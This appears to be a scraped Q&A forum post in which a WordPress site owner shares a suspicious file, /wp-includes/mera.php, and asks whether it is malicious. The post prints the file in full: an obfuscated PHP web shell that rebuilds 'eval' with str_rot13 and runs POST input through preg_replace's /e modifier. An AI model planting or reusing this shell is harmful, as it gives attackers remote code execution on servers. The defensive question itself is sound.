I found a suspicious PHP file /wp-includes/mera.php
Content:
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');
possibly do something malicious?
See Question&Answers more detail:
os 与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…